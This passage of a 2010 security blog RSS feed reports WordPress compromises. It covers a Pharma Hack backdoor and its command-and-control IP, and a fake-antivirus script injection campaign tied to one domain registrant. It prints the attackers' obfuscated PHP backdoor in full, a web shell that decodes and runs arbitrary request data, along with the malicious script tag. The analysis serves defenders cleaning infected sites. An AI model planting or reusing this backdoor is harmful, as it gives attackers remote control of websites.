<p>http://docs.google.com/document/edit?id=1-ZumxEpeOxw2kcoZZUtuF_8pu0lQl5xkS8aV_dRN00c</p>
<p>http://docs.google.com/document/edit?id=10S8bRb38l1Ew8d_KVH3b2O46PPhRXYp4uv3gyNJICQs</p>
<p>http://docs.google.com/document/edit?id=10zmjlIiu_b-gzxBipgl8R2asyLYLLkj0OnzhEFALcW0</p>
</blockquote>
<p>Details can be verified here: <a href="http://www.spamhaus.org/query/bl?ip=74.125.227.21">http://www.spamhaus.org/query/bl?ip=74.125.227.21</a> and <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL95011">here</a>.</p>
<hr />
<p>Check out <a href="http://sucuri.net">Sucuri Security</a> for a professional blacklist, Whois and malware monitoring solution. </p>

<p><a href="http://feedads.g.doubleclick.net/~a/TCyFYQGDhjcU4Pith154U3Ifm1E/0/da"><img src="http://feedads.g.doubleclick.net/~a/TCyFYQGDhjcU4Pith154U3Ifm1E/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/TCyFYQGDhjcU4Pith154U3Ifm1E/1/da"><img src="http://feedads.g.doubleclick.net/~a/TCyFYQGDhjcU4Pith154U3Ifm1E/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/8iWja2K0lrs" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/gmail-blacklisted-by-spamhaus.html/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/gmail-blacklisted-by-spamhaus.html</feedburner:origLink></item>
		<item>
		<title>Pharma hack and their C&amp;C (Command &amp; control) server</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/QK4lTr8Gtzk/pharma-hack-and-their-cc-command-control-server.html</link>
		<comments>http://blog.sucuri.net/2010/08/pharma-hack-and-their-cc-command-control-server.html#comments</comments>
		<pubDate>Thu, 12 Aug 2010 20:34:34 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[pharma]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=743</guid>
		<description><![CDATA[A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack: Understanding and cleaning &#8230; <a href="http://blog.sucuri.net/2010/08/pharma-hack-and-their-cc-command-control-server.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>A large portion of the sites <a href="http://sucuri.net">Sucuri</a> has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack:</p>
<p><a href="http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html">Understanding and cleaning the pharma hack on WordPress</a></p>
<p>One thing we&#8217;ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address:  <strong>94.76.241.4</strong> (curingin.com).</p>
<p>If your site has been affected you can double check your access.log for these entries:</p>
<blockquote><p>
94.76.241.4 &#8211; - [31/Jul/2010:06:07:59 -0700] &#8220;POST /wp-content/themes/classic/sidebar.php HTTP/1.1&#8243; 500 374 &#8220;-&#8221; &#8220;-&#8221;<br />
94.76.241.4 &#8211; - [31/Jul/2010:06:08:30 -0700] &#8220;POST /wp-content/themes/classic/sidebar.php HTTP/1.1&#8243; 500 447 &#8220;-&#8221; &#8220;-&#8221;<br />
94.76.241.4 &#8211; - [31/Jul/2010:11:06:55 -0700] &#8220;POST /wp-content/themes/classic/sidebar.php HTTP/1.1&#8243; 500 444 &#8220;-&#8221; &#8220;-&#8221;<br />
94.76.241.4 &#8211; - [30/Jul/2010:12:57:41 -0700] &#8220;POST /wp-content/themes/classic/comments.php HTTP/1.1&#8243; 200 202 &#8220;-&#8221; &#8220;-&#8221;
</p></blockquote>
<p>This IP is hosted at <strong>Blueconnex</strong> and even after tons of abuse reports (from multiple sources), the&#8217;ve sat idle.</p>
<blockquote><p>
$ whois 94.76.241.4<br />
route:          94.76.192.0/18<br />
descr:          Blueconnex Networks Ltd<br />
origin:         AS29550
</p></blockquote>
<p><span id="more-743"></span></p>
<blockquote><p>
$ whois curingin.com<br />
Registrant:<br />
    Icarus Kann Team<br />
    Icarus Kann        (ikaruskann@ymail.com)<br />
    Potokaki<br />
    Elounda<br />
    Samos,81300<br />
    GR<br />
    Tel. +210.9882728
</p></blockquote>
<p>Requests from the IP address try to access a backdoor they&#8217;ve inserted inside the /themes directory (generally sidebar.php, comments.php, 404.php, etc). This is what the backdoor looks like (all in one line):</p>
<blockquote><p>
&lt; ?php $a = &#8216;m&#8217;.'d5&#8242;;<br />
if($a($_REQUEST[$a])==&#8217;698357e86842&#8242;.&#8217;1222bcf89349bd5cf34d&#8217;)<br />
   {$w = &#8216;Cdbl0sYoWOiyJt3qtqyOoqxA&#8217;;$x = $_REQUEST[$w];<br />
   $y = &#8216;base&#8217;.&#8217;6&#8242;;$y.= &#8217;4_d&#8217;.'ecode&#8217;;$x = $y($x);$z = &#8216;creat&#8217;.'e_f&#8217;;<br />
   $z.= &#8216;unction&#8217;;$x = $z(&#8221;,$x);$x();} ?&gt;
</p></blockquote>
<p><strong>If your site is hacked and it keeps getting reinfected, look for this backdoor.</strong></p>
<p>Once that file is called, it re-uploads another script into the /plugins directory and inserts new entries in the DB. Our friend <a href="http://andrewloe.com">W. Andrew Loe III</a> did a good analysis of this attack and found how it works in detail (he was able to decode all the files in his honeypot).</p>
<p>That&#8217;s the first file the attackers uploaded to hack everything:<br />
<a href="http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=7b1341a148b1d8a205587218f66ef912">http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=7b1341a148b1d8a205587218f66ef912</a></p>
<p>You see that it reads wp-config.php, creates a new plugin and activates it. This is the file added to the plugins:<br />
<a href="http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=a9663c48164df1fcc59253aed5a0defc">http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=a9663c48164df1fcc59253aed5a0defc</a></p>
<p>This one is executed as well:<br />
<a href="http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=eb5db5a81632a089fd07fa259c0448a6">http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=eb5db5a81632a089fd07fa259c0448a6</a></p>
<p>So a very interesting and complex attack they&#8217;ve managed to pull off. Many sites are still infected, so they probably have a large number of sites under their control. </p>
<hr />
<p>If your site is infected and you need help, <a href="http://sucuri.net">contact us</a>.  We&#8217;ll get your site cleaned up and malware-free right away.</p>
<p>Protect your interwebs!</p>

<p><a href="http://feedads.g.doubleclick.net/~a/rTskSnoyVinGz0XxNYt_6pWvkE4/0/da"><img src="http://feedads.g.doubleclick.net/~a/rTskSnoyVinGz0XxNYt_6pWvkE4/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/rTskSnoyVinGz0XxNYt_6pWvkE4/1/da"><img src="http://feedads.g.doubleclick.net/~a/rTskSnoyVinGz0XxNYt_6pWvkE4/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/QK4lTr8Gtzk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/pharma-hack-and-their-cc-command-control-server.html/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/pharma-hack-and-their-cc-command-control-server.html</feedburner:origLink></item>
		<item>
		<title>Yet another series of attacks (part X) – vancouvererrorsonfile.com and the hilarykneber group</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/5h0dcZleXyo/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html</link>
		<comments>http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html#comments</comments>
		<pubDate>Thu, 05 Aug 2010 04:57:05 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[bluehost]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=732</guid>
		<description><![CDATA[If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc. The new one that started to spread today uses a javascript file pointing &#8230; <a href="http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc.</p>
<p>The new one that started to spread today uses a javascript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it will load www4.meowmeow4.co.cc and then offer the famous &#8220;fake AV&#8221; virus to the end user of a site. That&#8217;s how it looks like in a site:</p>
<blockquote><p>
&lt; script src =&quot; http://vancouvererrorsonfile.com/js2.php
</p></blockquote>
<p>Or in our <a href="http://sucuri.net">scanner</a> (<a href="http://sucuri.net/malware/entry/MW:BLUEH:2">blueh2</a>):<br />
<span id="more-732"></span><br />
<a href="http://1.bp.blogspot.com/_w4XYN7NmRts/TFpA2uUqonI/AAAAAAAAAJQ/-lqkJ-7QDhw/s1600/Picture+9.png"><img alt="" src="http://1.bp.blogspot.com/_w4XYN7NmRts/TFpA2uUqonI/AAAAAAAAAJQ/-lqkJ-7QDhw/s1600/Picture+9.png" title="malware" class="alignnone" width="616" height="31" /></a></p>
<p>Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread only on Bluehost and Dreamhost, but it seems to be too early to tell how many sites are affected.</p>
<p><b>If your site is hacked, this script should clean it up: <a href="http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html">virus-fix.php</a> or contact us for a <a href="http://sucuri.net">professional help</a> (support@sucuri.net).</b></p>
<p>However, what is interesting is the people behind this attack (and all others). Those domains are always registered by:</p>
<blockquote><p>
   Hilary Kneber hilarykneber@yahoo.com<br />
   7569468 fax: 7569468<br />
   29/2 Sun street. Montey 29<br />
   Virginia NA 3947<br />
   us
</p></blockquote>
<p>You can check all the big ones that affected a large number of sites:</p>
<blockquote><p>
whereisdudescars.com<br />
domainameat.cc<br />
cloudisthebestnow.com<br />
losotrana.com<br />
indesignstudioinfo.com<br />
zettapetta.com
</p></blockquote>
<p>All by the same group and all of them using the same tactics. We should start monitoring registrations using this domain and block them automatically.</p>
<p>We will post more details as we learn about it.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/TP95k8fJGuAlKmJf1zlksDtnj6c/0/da"><img src="http://feedads.g.doubleclick.net/~a/TP95k8fJGuAlKmJf1zlksDtnj6c/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/TP95k8fJGuAlKmJf1zlksDtnj6c/1/da"><img src="http://feedads.g.doubleclick.net/~a/TP95k8fJGuAlKmJf1zlksDtnj6c/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/5h0dcZleXyo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html</feedburner:origLink></item>
	</channel>
</rss><!-- Dynamic page generated in 0.475 seconds. --><!-- Cached page generated by WP-Super-Cache on 2010-09-08 16:35:17 --><!-- Compression = gzip -->
